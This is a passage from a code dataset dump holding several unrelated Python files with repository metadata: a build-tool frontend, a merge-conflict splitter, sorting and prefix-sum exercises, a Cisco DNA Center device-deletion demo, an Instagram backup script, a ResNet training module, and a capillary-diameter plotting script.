\\\"%s\\\"\"%(search_pat,replace_pat))\n n = 0\n for pkg,filenames in qp:\n n += replace.replace( pkg,\n search_pat,\n replace_pat,\n filenames = filenames )\n print()\n print(\"Performed %i replacements\"%n)\n raise SystemExit\n\n if opt.find:\n qp = query_pkgs()\n pattern = opt.find\n from . import find\n print()\n print(\"Finding files and paths matching \\\"%s\\\"\"%(opt.find))\n print()\n n = 0\n for pkg,filenames in qp:\n n += find.find( pkg,\n pattern = opt.find,\n filenames = filenames )\n print()\n print(\"Found %i matches\"%n)\n raise SystemExit\n\n if opt.incinfo:\n import glob\n def _val_incinfofn(fn):\n if '*' in fn:\n #try to expand wildcards:\n fff = sorted(glob.glob(fn))\n if fff:\n return sum((_val_incinfofn(ff) for ff in fff),[])\n if not os.path.exists(fn):\n #Could be of form \"pkgname/subdir/file. If so, expand pkgname part\n #to full path to package:\n i=fn.split(os.path.sep)\n pkg=pkgloader.name2pkg.get(i[0],None) if len(i)==3 else None\n if pkg:\n return _val_incinfofn(dirs.pkg_dir(pkg,i[1],i[2]))\n else:\n parser.error(\"File not found: %s\"%fn)\n if os.path.isdir(fn):\n parser.error(\"Not a file: %s\"%fn)\n fn=os.path.abspath(os.path.realpath(fn))\n p = pathlib.Path(fn).absolute().resolve()\n simplebuild_pkg_dirs = [dirs.projdir, *dirs.extrapkgpath]\n if not any( utils.path_is_relative_to(p,d)\n for d in simplebuild_pkg_dirs):\n _dirsfmt=('\\n '.join(str(e) for e in simplebuild_pkg_dirs))\n parser.error(f'File {p} must be located under one of the '\n f'following directories:\\n{_dirsfmt}')\n return [fn]#expands to a single file\n from . import incinfo\n fnsraw = opt.incinfo.split(',') if ',' in opt.incinfo else [opt.incinfo]\n fns = sum((_val_incinfofn(fnraw) for fnraw in fnsraw),[])\n #remove duplicates (relies on seen.add returning None)\n seen=set()\n fns = [fn for fn in fns if not (fn in seen or seen.add(fn))]\n #Dispatch to backend:\n if len(fns)==1:\n incinfo.provide_info(pkgloader,fns[0])\n else:\n incinfo.provide_info_multifiles(pkgloader,fns)\n raise SystemExit\n\n if opt.pkginfo:\n pkg=pkgloader.name2pkg.get(opt.pkginfo,None)\n if not pkg:\n utils.err('Unknown package \"%s\"'%opt.pkginfo)\n else:\n pkg.dumpinfo(pkgloader.autodeps)\n raise SystemExit\n\n if opt.pkggraph:\n dotfile=dirs.blddir / 'pkggraph.dot'\n from . import dotgen\n dotgen.dotgen(pkgloader,dotfile,enabled_only=opt.pkggraph_activeonly)\n if not opt.quiet:\n print('Package dependencies in graphviz DOT format has'\n ' been generated in %s'%(dotfile))\n ec=utils.system('dot -V > /dev/null 2>&1')\n if ec:\n if not opt.quiet:\n print('Warning: command \"dot\" not found or ran into problems.')\n print('Please install graphviz to enable graphical'\n ' dependency displays')\n sys.exit(1)\n pkggraphout = dirs.blddir / 'pkggraph.png'\n import shlex\n ec=utils.system(\n 'unflatten -l3 -c7 %s|dot -Tpng -o %s'%(shlex.quote(str(dotfile)),\n shlex.quote(str(pkggraphout)))\n )\n if ec or not pkggraphout.is_file():\n if not opt.quiet:\n print('Error: Problems with dot command while transforming'\n f' {dotfile.name} to {pkggraphout.name}')\n sys.exit(1)\n else:\n if not opt.quiet:\n print('Package dependencies in PNG format has been generated'\n ' in %s'%pkggraphout)\n raise SystemExit\n\n\n if not opt.njobs:\n from . import cpudetect\n opt.njobs=cpudetect.auto_njobs()\n\n if not opt.quiet:\n print(\"Configuration completed => Launching build with %i parallel processes\"%opt.njobs)\n\n #VERBOSE:\n # -1: always quiet\n # 0: only warnings\n # 1: extra verbose printouts\n if opt.verbose:\n extramakeopts=' VERBOSE=1'\n elif opt.quiet:\n extramakeopts=' VERBOSE=-1'\n else:\n extramakeopts=''\n\n assert dirs.makefiledir.is_dir()\n ec = utils.system(f'cd {dirs.makefiledir} && '\n 'make --warn-undefined-variables -f Makefile'\n f' -j{opt.njobs}{extramakeopts}')\n if ec!=0:\n if not opt.quiet:\n print(\"ERROR: Build problems encountered\")\n sys.exit(1 if ec > 128 else ec)\n\n if not opt.quiet:\n from . import build_summary\n build_summary.produce_build_summary(\n pkgloader = pkgloader,\n verbose = opt.verbose\n )\n\n if opt.runtests:\n assert (conf.test_dir().parent / '.sbbuilddir').exists()\n import shutil\n shutil.rmtree(conf.test_dir(),ignore_errors=True)\n _testfilter=''\n if opt.testfilter:\n _testfilter=[fltr.strip() for fltr in opt.testfilter.split(',') if fltr.strip()]\n from .testlauncher import perform_tests\n ec = perform_tests( testdir = dirs.testdir,\n installdir = dirs.installdir,\n njobs = opt.njobs,\n nexcerpts = opt.nexcerpts,\n filters = _testfilter,\n do_pycoverage = False,\n pkgloader = pkgloader )\n\n from . import env\n from . import col\n cp = env.env['cmake_printinfo']\n if ec==0 and (cp['unused_vars'] or cp['other_warnings']):\n #Make sure user sees these warnings:\n print('%sWARNING%s There were warnings (see above)'%(col.bad,col.end))\n print()\n if ec:\n sys.exit(ec)\n\n if not opt.quiet:\n from .envsetup import calculate_env_setup\n needs_env_setup = bool(calculate_env_setup())\n if not prevent_env_setup_msg and needs_env_setup:\n from . import col\n print(f'{col.warnenvsetup}Build done. To use the resulting environment you must first enable it!{col.end}')\n print()\n print(f'{col.warnenvsetup}Type the following command (exactly) to do so (undo later by --env-unsetup instead):{col.end}')\n print()\n print(f' {col.warnenvsetup}eval \"$({progname} --env-setup)\"{col.end}')\n print()\n else:\n print(\"Build done. You are all set to begin using the software!\")\n print()\n if not needs_env_setup:\n print(f'To see available applications, type \"{conf.runnable_prefix}\" and hit the TAB key twice.')\n print()\n","repo_name":"mctools/simplebuild","sub_path":"src/_simple_build_system/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":17053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7796048487","text":"#again rerun\nimport os\nimport re\ndef run(arguments):\n needsspace_re = re.compile(r'(\\w[):;\"-\\.,!}]*) +([^%}~])')\n allmarkers_re = re.compile(r'(.*?)%(\\[ORIG|ORIG\\]\\[NEW|NEW\\])%(.*\\n*)')# in all these, the newline at the end is just so it doesn't gobble up the newline\n def parse_line(orig_log_text,new_log_text,log_in_orig,log_in_new,text_to_parse):\n match = allmarkers_re.match(text_to_parse)\n if match:\n textone,typeofmarker,texttwo = match.groups()\n if typeofmarker == 'NEW]':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_new and not log_in_orig:\n switchto = (True,True)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered an end marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %NEW]% marker, but I was not leaving orig along and logging only in new (False,True), but rather \"+repr(log_in_orig)+','+repr(log_in_new)+\":\\n\"+text_to_parse)\n elif typeofmarker == 'ORIG][NEW':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_orig and not log_in_new:\n switchto = (False,True)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered a middle marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %ORIG][NEW% marker, but I was not logging in orig but not in new, but rather \"+repr(log_in_orig)+','+repr(log_in_new),\":\\n\",text_to_parse)\n elif typeofmarker == '[ORIG':\n print(\"found a matching line, current status is (\",log_in_orig,',',log_in_new,\")\")\n if log_in_new and log_in_orig:\n switchto = (True,False)# log in orig, log in new\n print(\"in text:\\n\",text_to_parse,\"\\n--> encountered an %[ORIG% marker, switching to\",switchto)\n else:\n raise ValueError(\"I encountered an %[ORIG% marker, but I was not logging in both orig and new, but rather\"+repr(log_in_orig)+','+repr(log_in_new)+\":\\n\"+text_to_parse)\n else:\n textone = text_to_parse\n texttwo = None\n #}}} check to see if I have a separator\n # regardless, dump the first group into the current bin \n if log_in_orig:\n orig_log_text += textone\n if log_in_new:\n new_log_text += textone\n if match:\n log_in_orig,log_in_new = switchto\n print(\"yes, I am actually switching the binning\")\n print(\"so that status is (\",log_in_orig,',',log_in_new,\")\")\n # if there is a second group (if I have a separator), change which bin I'm in, and add to the end of the current line!\n if texttwo is not None:\n orig_log_text,new_log_text,log_in_orig,log_in_new = parse_line(orig_log_text,new_log_text,log_in_orig,log_in_new,texttwo)\n return orig_log_text,new_log_text,log_in_orig,log_in_new\n fp = open(arguments[0],'r')\n text_list = []\n print('opened',arguments[0])\n log_in_orig = True\n log_in_new = True\n head_title = None\n new_title = None\n #{{{ pull out just the part between the document text\n orig_textlist = []\n new_textlist = []\n j = 0\n for thisline in fp:\n if j == 0:\n if thisline[:12] == '%ONEWORDDIFF':\n print(\"found %ONEWORDDIFF marker, title is:\")\n head_title = 'HEAD\\n'\n new_title = thisline[14:]\n print(new_title)\n this_is_a_onewordfile = True\n else:\n this_is_a_onewordfile = False\n if this_is_a_onewordfile:\n print(\"I found this to be a oneword format file\")\n else:\n print(\"I did not find this to be a oneword format file\")\n if this_is_a_onewordfile:# this is only stored if it's a onewordfile\n #new processing for oneworddiff\n #{{{ check to see if I have a separator, and set switchto, to show where I switch\n orig_log_text,new_log_text,log_in_orig,log_in_new = parse_line('','',log_in_orig,log_in_new,thisline)\n if len(orig_log_text) > 0:\n orig_textlist.append(orig_log_text)\n if len(new_log_text) > 0:\n new_textlist.append(new_log_text)\n else:\n #standard processing\n if thisline[-11:] == '%FIRSTSET%\\n': # if the first set, treat like it's not a comment\n if log_in_orig:\n orig_textlist.append(thisline)\n if log_in_new:\n new_textlist.append(thisline)\n else:\n if (thisline[:7] == '<<<<<<<'):\n log_in_orig = True\n log_in_new = False\n if (head_title is None): # for the first marker, store the title\n head_title = thisline[7:]\n elif thisline[7:] == head_title:\n pass\n else:\n raise ValueError(\"I don't understand line %d, which seems to give an inconsistent head title. It gave:\\n%s\\nvs expected:\\n%s\"%(j,thisline[7:],head_title))\n elif (thisline[:7] == '>>>>>>>'):\n log_in_orig = True\n log_in_new = True\n if (new_title is None): # for the first marker, store the title\n new_title = thisline[7:]\n elif thisline[7:] == new_title:\n pass\n else:\n raise ValueError(\"I don't understand line %d, which seems to give an inconsistent new title. It gave:\\n%s\\nvs expected:\\n%s\"%(j,thisline[7:],new_title))\n elif (thisline[:7] == '======='):\n log_in_orig = False\n log_in_new = True\n else:\n if log_in_orig:\n orig_textlist.append(thisline)\n if log_in_new:\n new_textlist.append(thisline)\n j+=1\n if this_is_a_onewordfile:\n print(\"I found this to be a oneword format file\")\n else:\n print(\"I did not find this to be a oneword format file\")\n fp.close()\n #{{{ write out the result\n newfile = re.sub(r\"(.*)\",r'\\1.merge_new',arguments[0]) \n fp = open(newfile,'w')\n new_textlist = ['#%%%%%BRANCH TITLE (This side is saved): '+new_title] + new_textlist\n fp.write(''.join(new_textlist))\n fp.close()\n newfile = re.sub(r\"(.*)\",r'\\1.merge_head',arguments[0]) \n fp = open(newfile,'w')\n orig_textlist = ['#%%%%%BRANCH TITLE: '+head_title] + orig_textlist\n fp.write(''.join(orig_textlist))\n fp.close()\n #}}}\n","repo_name":"jmfranck/pyDiffTools","sub_path":"pydifftools/split_conflict.py","file_name":"split_conflict.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1107619035","text":"def selectionSort(arr, N) :\n for i in range(N-1) :\n minIdx = i\n for j in range(i+1, N) :\n if arr[minIdx] > arr[j] :\n minIdx = j\n print(f'가장 작은 값 : {minIdx}')\n print(f'현재 가장 왼쪽 idx : {i}')\n arr[i], arr[minIdx] = arr[minIdx], arr[i]\n print('='*30)\n print()\n print(arr)\n\narr = [8, 10, 53, 2, 16, 9, 42, 22]\nN = len(arr)\nprint(arr)\nselectionSort(arr, N)\n","repo_name":"RoraKim/Homework","sub_path":"3_algorithm_hws/0214/0214_prof/selection_sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7408099199","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Nick Russo\nPurpose: Demonstrate Python \"requests\" to delete an existing\ndevice from Cisco DNA Center using the REST API.\n\"\"\"\n\nimport time\nimport requests\nfrom auth_token import get_token\n\n\ndef main():\n \"\"\"\n Execution begins here.\n \"\"\"\n\n # Reuse the get_token() function from before. If it fails\n # allow exception to crash program\n token = get_token()\n\n # Declare useful local variables to simplify request process\n api_path = \"https://sandboxdnac.cisco.com/dna\"\n headers = {\"Content-Type\": \"application/json\", \"X-Auth-Token\": token}\n\n # Issue an HTTP GET to search for a specific device by IP address\n delete_ip = \"192.0.2.1\"\n get_resp = requests.get(\n f\"{api_path}/intent/api/v1/network-device/ip-address/{delete_ip}\",\n headers=headers,\n )\n\n # If the device was found, continue with deletion\n if get_resp.ok:\n delete_id = get_resp.json()[\"response\"][\"id\"]\n print(f\"Found device with mgmt IP {delete_ip} and ID {delete_id}\")\n\n # Issue HTTP DELETE and specify the device ID. Like the HTTP POST\n # to add a device, this is an asynchronous operation\n delete_resp = requests.delete(\n f\"{api_path}/intent/api/v1/network-device/{delete_id}\",\n headers=headers,\n )\n\n # If delete succeeded, check task ID for completion\n if delete_resp.ok:\n\n # Wait 10 seconds after server responds\n print(f\"Request accepted: status code {delete_resp.status_code}\")\n time.sleep(10)\n\n # Query DNA center for the status of the specific task ID\n task = delete_resp.json()[\"response\"][\"taskId\"]\n task_resp = requests.get(\n f\"{api_path}/intent/api/v1/task/{task}\", headers=headers\n )\n\n # See if the task was completed successfully or not\n if task_resp.ok:\n task_data = task_resp.json()[\"response\"]\n if not task_data[\"isError\"]:\n print(\"Old device successfully deleted\")\n else:\n print(f\"Async task error seen: {task_data['progress']}\")\n else:\n print(f\"Async GET failed: status code {task_resp.status_code}\")\n\n else:\n # The initial HTTP DELETE failed; print details\n print(f\"Device removal failed with code {delete_resp.status_code}\")\n print(f\"Failure body: {delete_resp.text}\")\n\n else:\n print(f\"Could not find device with mgmt IP {delete_ip}\")\n print(f\"Code: {get_resp.status_code} Body: {get_resp.text}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nickrusso42518/pluralsight","sub_path":"devasc1/m6/delete_device.py","file_name":"delete_device.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"23135910493","text":"from datetime import datetime\r\nimport subprocess\r\nimport requests\r\nimport random\r\nimport time\r\nimport os\r\n\r\n\r\n#Constants #TODO:Config file\r\nabsolute_path = os.path.dirname(__file__)\r\n\r\nlog_path = f\"{absolute_path}/instagram.backup.log\"\r\naccount_file = f\"{absolute_path}/accounts/ActiveAccounts.txt\"\r\ninactive_account_file = f\"{absolute_path}/accounts/InactiveAccounts.txt\"\r\ninstaloader_params = \"--latest-stamps --login=YOUR USERNAME --stories --highlights --tagged --igtv --comments --geotags --igtv\" #TODO:unhardcode\r\nbackup_folder = f\"{absolute_path}/instagram.backup\"\r\nntfy_level = \"full\"\r\n\r\n#Variables\r\nlog_filename = f\"{log_path}/{datetime.now().strftime('%d-%m-%y %H:%M:%S')}.log\"\r\nprocessed_account = 0\r\n\r\ndef main():\r\n initialize()\r\n for acc in account_list:\r\n download_profile(acc)\r\n show_status(processed_account, account_list)\r\n do_sleep()\r\n finalize()\r\n\r\ndef initialize():\r\n global account_list\r\n global inactive_account_list\r\n global starting_time \r\n \r\n os.chdir(backup_folder)\r\n to_log(f\"{current_time()} Backup Started\")\r\n account_list, inactive_account_list = import_account()\r\n starting_time = current_time()\r\n to_log(f\"Archiving: {len(account_list)} Accounts\")\r\n to_log(f\"No longer Archiving: {len(inactive_account_list)} Accounts\")\r\n to_log(\"============================================\") \r\n message = {\r\n \"Title\": f\"[{starting_time}] Instagram Backup started.\",\r\n \"Content\": f\"Archiving: {len(account_list)} Accounts.No longer archiving: {len(inactive_account_list)} Accounts.\"\r\n }\r\n ntfy(message)\r\n \r\ndef import_account():\r\n try:\r\n with open(account_file, \"r\") as file:\r\n account_list = file.read().splitlines()\r\n with open(inactive_account_file, \"r\") as file:\r\n inactive_account_list = file.read().splitlines()\r\n return account_list, inactive_account_list\r\n except IOError:\r\n to_log(\"[ERROR]: Failed to import accounts\")\r\n exit(1)\r\n \r\ndef download_profile(username):\r\n try:\r\n to_log(f\"[{current_time()}]Processing Account: {username}\") #\r\n command = f\"{instaloader_params} {username}\" #\r\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #TODO:Change to Python\r\n output, error = process.communicate() #\r\n to_log(output.decode('utf-8')) #\r\n print(f\"Profile '{username}' downloaded successfully.\")\r\n except Exception as e:\r\n print(f\"Error downloading profile '{username}': {e}\")\r\n \r\ndef show_status(processed_account, account_list):\r\n progress = f\"{processed_account}/{len(account_list)}\"\r\n percentage = f\"{(processed_account / len(account_list)) * 100:.2f}%\"\r\n to_log((f\"Progress: {progress} | {percentage}\"))\r\n\r\ndef do_sleep():\r\n sleep_time = min(random.expovariate(0.6), 15.0)\r\n to_log(f\"Sleeping {sleep_time} Seconds...\")\r\n to_log(\"============================================\")\r\n time.sleep(sleep_time)\r\n\r\ndef finalize():\r\n ending_time = current_time()\r\n if ntfy == \"full\": #TODO:More notification options\r\n notification_data = {\r\n \"Title\": f\"{ending_time} Instagram Backup beendet.\",\r\n \"Message\": \"Backup beendet\"\r\n }\r\n ntfy(notification_data)\r\n to_log(f\"[{ending_time}] Backup finished.\")\r\n \r\ndef ntfy(data):\r\n url = \"https://ntfy.sh/InstaLoader1101\"\r\n headers = { \"Title\": data[\"Title\"] } #Unschön, aber jede Änderung macht den Code Kaputt\r\n requests.post(url, headers=headers, data=data[\"Content\"])\r\n \r\ndef to_log(entry):\r\n with open(log_filename, \"a\") as log_file:\r\n log_file.write(f\"{entry}\\n\")\r\n \r\ndef current_time():\r\n return datetime.now().strftime('%d-%m-%y %H:%M:%S')\r\n\r\nmain()","repo_name":"Wirezat/InstagramBackup","sub_path":"instagram_backup.py","file_name":"instagram_backup.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3965259834","text":"import pytorch_lightning as pl\nimport torch\nimport torchvision\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchmetrics import F1Score, AUROC\nfrom torchmetrics.classification import MulticlassAccuracy, BinaryAccuracy, MulticlassPrecision\n\n\nclass ResNet(pl.LightningModule):\n\n def __init__(self, classes, lr, weight_decay, metric=\"accuracy\", max_epochs=100):\n \"\"\"\n\n :param classes (tuple(str, int)): list of tuples, each tuple consists of class name and class index\n :param lr (float): learning rate\n :param weight_decay (float): weight decay of optimizer\n :param max_epochs (int): maximum epochs\n :param accuracy (str): specifies the type of metric\n \"\"\"\n super().__init__()\n self.save_hyperparameters()\n self.model = torchvision.models.resnet18(num_classes=len(self.hparams.classes))\n self.train_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n self.val_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n self.test_ac = MulticlassAccuracy(num_classes=len(self.hparams.classes), average=None)\n\n self.train_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n self.val_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n self.test_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n\n self.train_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n self.val_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n self.test_p = MulticlassPrecision(num_classes=len(self.hparams.classes), average=None)\n\n task = \"binary\" if len(self.hparams.classes) == 2 else \"multiclass\"\n self.train_f1 = F1Score(task=task, num_classes=3)\n self.val_f1 = F1Score(task=task, num_classes=len(self.hparams.classes))\n self.test_f1 = F1Score(task=task, num_classes=len(self.hparams.classes))\n\n self.train_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n self.val_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n self.test_auc = AUROC(task=task, num_classes=len(self.hparams.classes))\n\n self.metrics = {\"train\": [self.train_ac, self.train_p, self.train_f1,\n # self.train_auc\n ],\n \"val\": [self.val_ac, self.val_p, self.val_f1,\n # self.val_auc\n ],\n \"test\": [self.test_ac, self.test_p, self.test_f1,\n # self.test_auc\n ]\n }\n\n def configure_optimizers(self):\n optimizer = optim.AdamW(self.parameters(),\n lr=self.hparams.lr,\n weight_decay=self.hparams.weight_decay)\n lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[int(self.hparams.max_epochs * 0.7),\n int(self.hparams.max_epochs * 0.9)],\n gamma=0.1)\n return [optimizer], [lr_scheduler]\n\n def _calculate_loss(self, batch):\n imgs, labels = batch[\"img\"], batch[\"label\"]\n preds = self.model(imgs)\n loss = F.cross_entropy(preds, labels)\n return {\"loss\": loss, \"preds\": torch.flatten(preds.argmax(dim=-1)), \"labels\": torch.flatten(labels)}\n\n def training_step(self, batch, batch_idx):\n return self._calculate_loss(batch)\n\n def training_step_end(self, batch_parts):\n preds = batch_parts[\"preds\"]\n labels = batch_parts[\"labels\"]\n for metric in self.metrics[\"train\"]:\n metric.update(preds, labels)\n self.train_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()), labels)\n return batch_parts[\"loss\"]\n\n def training_epoch_end(self, outputs):\n cm = self.train_ac.compute()\n f1 = self.train_f1.compute()\n precision = self.train_p.compute()\n auc = self.train_auc.compute()\n\n log = {}\n for c in self.hparams.classes:\n log[f\"train_accuracy_\" + c[0]] = cm[c[1]]\n log[f\"train_precision_\" + c[0]] = precision[c[1]]\n\n log[\"train_f1\"] = f1\n log[\"train_auc\"] = auc\n log[\"train_loss\"] = outputs[-1]\n self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n for metric in self.metrics[\"train\"]:\n metric.reset()\n self.train_auc.reset()\n\n def validation_step(self, batch, batch_idx):\n return self._calculate_loss(batch)\n\n def validation_step_end(self, batch_parts):\n preds = batch_parts[\"preds\"]\n labels = batch_parts[\"labels\"]\n for metric in self.metrics[\"val\"]:\n metric.update(preds, labels)\n self.val_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()),\n labels)\n return batch_parts[\"loss\"]\n\n def validation_epoch_end(self, outputs):\n cm = self.val_ac.compute()\n f1 = self.val_f1.compute()\n precision = self.val_p.compute()\n auc = self.val_auc.compute()\n\n log = {}\n for c in self.hparams.classes:\n log[f\"val_accuracy_\" + c[0]] = cm[c[1]]\n log[f\"val_precision_\" + c[0]] = precision[c[1]]\n\n log[\"val_f1\"] = f1\n log[\"val_auc\"] = auc\n log[\"val_loss\"] = outputs[-1]\n self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n for metric in self.metrics[\"val\"]:\n metric.reset()\n self.val_auc.reset()\n\n def test_step(self, batch, batch_idx):\n return self._calculate_loss(batch)\n\n def test_step_end(self, batch_parts):\n preds = batch_parts[\"preds\"]\n labels = batch_parts[\"labels\"]\n for metric in self.metrics[\"test\"]:\n metric.update(preds, labels)\n self.test_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()),\n labels)\n return batch_parts[\"loss\"]\n\n def test_epoch_end(self, outputs):\n cm = self.test_ac.compute()\n f1 = self.test_f1.compute()\n precision = self.test_p.compute()\n auc = self.test_auc.compute()\n\n log = {}\n for c in self.hparams.classes:\n log[f\"test_accuracy_\" + c[0]] = cm[c[1]]\n log[f\"test_precision_\" + c[0]] = precision[c[1]]\n\n log[\"test_f1\"] = f1\n log[\"test_auc\"] = auc\n log[\"test_loss\"] = outputs[-1]\n self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n for metric in self.metrics[\"test\"]:\n metric.reset()\n self.test_auc.reset()","repo_name":"sinagh72/contrastive-learning","sub_path":"models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40246567497","text":"\"\"\"\nFilename: find_radii.py\n-----------------------\n# TODO fix this\nThis is broken. \n\nBy: Marcus Forst\n\"\"\"\n\nimport os, time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom src.tools.load_csv_list import load_csv_list\nfrom src.tools.parse_path import parse_vid_path\n\n\nPIX_UM = 1.74\n\ndef plot_box_swarm(data, x_labels, y_axis_label, plot_title, figure_name, verbose = True, write = False, remove_outliers = False):\n \"\"\"Plot box-plot and swarm plot for data list.\n \n Args:\n data (list of list): List of lists with data to be plotted.\n y_axis_label (str): Y- axis label.\n x_labels (list of str): List with labels of x-axis.\n plot_title (str): Plot title.\n figure_name (str): Path to output figure.\n \n \"\"\"\n if remove_outliers:\n # # Remove outliers using the clip function\n # data_clipped, outliers = select_outliers(data)\n # # initialize plot information:\n # sns.set(color_codes=True)\n # plt.figure(1, figsize=(9, 6))\n # plt.title(plot_title)\n\n # # Create box and swarm plot with clipped data\n # ax = sns.boxplot(data=data_clipped)\n # sns.swarmplot(data=data_clipped, color=\".25\")\n # sns.swarmplot(data = outliers, color = \"red\")\n # if verbose: plt.show()\n pass\n else:\n # initialize plot information:\n sns.set(color_codes=True)\n plt.figure(1, figsize=(9, 6))\n plt.title(plot_title)\n \n # plot data on swarmplot and boxplot\n ax = sns.boxplot(data=data)\n sns.swarmplot(data=data, color=\".25\")\n \n # y-axis label\n ax.set(ylabel=y_axis_label)\n \n # write labels with number of elements\n ax.set_xticks(np.arange(len(data)), labels = x_labels)\n ax.legend()\n \n if write:\n # write figure file with quality 400 dpi\n plt.savefig(figure_name, bbox_inches='tight', dpi=400)\n if verbose: plt.show()\n else: plt.close()\n if verbose: plt.show()\n return 0\n\ndef main(path = 'C:\\\\Users\\\\gt8mar\\\\capillary-flow\\\\data\\\\part11\\\\230427\\\\vid01',\n write = True, verbose = False):\n input_folder = os.path.join(path, \"E_centerline\", \"coords\")\n output_folder = os.path.join(path, \"E_centerline\", \"images\")\n participant, date, video, file_prefix = parse_vid_path(path)\n skeleton_data = load_csv_list(input_folder, dtype=float)\n # load radii from skeleton data\n radii = [array[:, 2] for array in skeleton_data] # note that the radii will be row vectors\n medians = []\n means = []\n for capillary in radii:\n median = np.median(capillary) * 2 /PIX_UM\n mean = np.mean(capillary) *2/PIX_UM\n medians.append(median)\n means.append(mean)\n plot_box_swarm([medians, means], x_labels = [\"medians\", \"means\"], y_axis_label=\"diameter (um)\", \n plot_title=f\"{file_prefix} capillary diameters\", figure_name=\"figure 1\",\n write=True)\n return np.mean(means)\n\n\"\"\"\n-----------------------------------------------------------------------------\n\"\"\"\n# This provided line is required at the end of a Python file\n# to call the main() function.\nif __name__ == \"__main__\":\n ticks = time.time()\n means = []\n # for i in range(1,9):\n # sample = 'sample_' + str(i).zfill(3)\n # mean = main(\"set_01\", sample, write = False, verbose=False)\n # means.append(mean)\n # plt.plot(means)\n # plt.show() \n main(path = '/hpc/projects/capillary-flow/data/part11/230427/vid01', write = True, verbose = False) \n print(\"--------------------\")\n print(\"Runtime: \" + str(time.time() - ticks))\n","repo_name":"gt8mar/capillary-flow","sub_path":"src/find_radii.py","file_name":"find_radii.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74118526170","text":"# https://www.acmicpc.net/problem/1806\n\"\"\"\n10 < N < 100,000\nN 자리수로 만들어진 수열의 부분합중 그 합이 S 이상이 되는 것 중, 가장 짧은 것의 길이를 구하라\n\"\"\"\nimport math\n\nif __name__ == \"__main__\":\n\n n, s = map(int, input().split())\n sequence = list(map(int, input().split()))\n\n prefix_sum = [0]\n\n for i in range(0, n):\n prefix_sum.append(prefix_sum[i] + sequence[i])\n\n # 여기서 two pointer\n left = right = 0\n answer = math.inf\n while left < n:\n sum_value = prefix_sum[right] - prefix_sum[left]\n if sum_value >= s:\n answer = min(answer, right - left)\n # right == left 일때는 0이라서 left가 right를 넘어설 일이 없다.\n left += 1\n elif sum_value < s:\n if right == n:\n break\n right += 1\n if s == 0:\n print(1)\n else:\n print(0 if answer == math.inf else answer)\n\"\"\"\n10 100\n5 1 3 5 10 7 4 9 2 8\n\"\"\"","repo_name":"ekzm8523/CodingTestPractice","sub_path":"python/samsung_tutorial/basic_algorithm/1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29609285212","text":"import cv2\nimport os\n\nVIDEO_FORMATS = [\".mp4\", \".avi\",]\nIMAGE_FORMATS = [\".png\", \".jpg\", \".jpeg\"]\nCOLORS = [(255,0,0), (0,255,0), (0,0,255), (255,255,0), (0,255,255), (255,0,255), (0,128,0), (128,0,128), (245,222,179)]\n\ndef make_tracks(frame_results):\n tracks = {}\n\n for idx, frame_result in enumerate(frame_results):\n for result in frame_result:\n track_id = result[1]\n item = {\n \"frame_idx\": idx,\n \"confidence\": result[2],\n \"bbox\": result[3:6],\n \"class\": result[0],\n }\n if track_id not in tracks:\n tracks[track_id] = [item]\n else:\n tracks[track_id].append(item)\n\n return tracks\n\ndef join_tracks(tracks, identities):\n print(tracks.keys())\n print(identities)\n new_tracks = {}\n unknown_count = 0\n for track_id in tracks.keys():\n print(track_id)\n if track_id in identities:\n identity = identities[track_id]\n print(identity)\n if identity in new_tracks:\n # ugly validation for testint purposes\n for f in tracks[track_id]:\n for f2 in new_tracks[identity]:\n if f[\"frame_idx\"] == 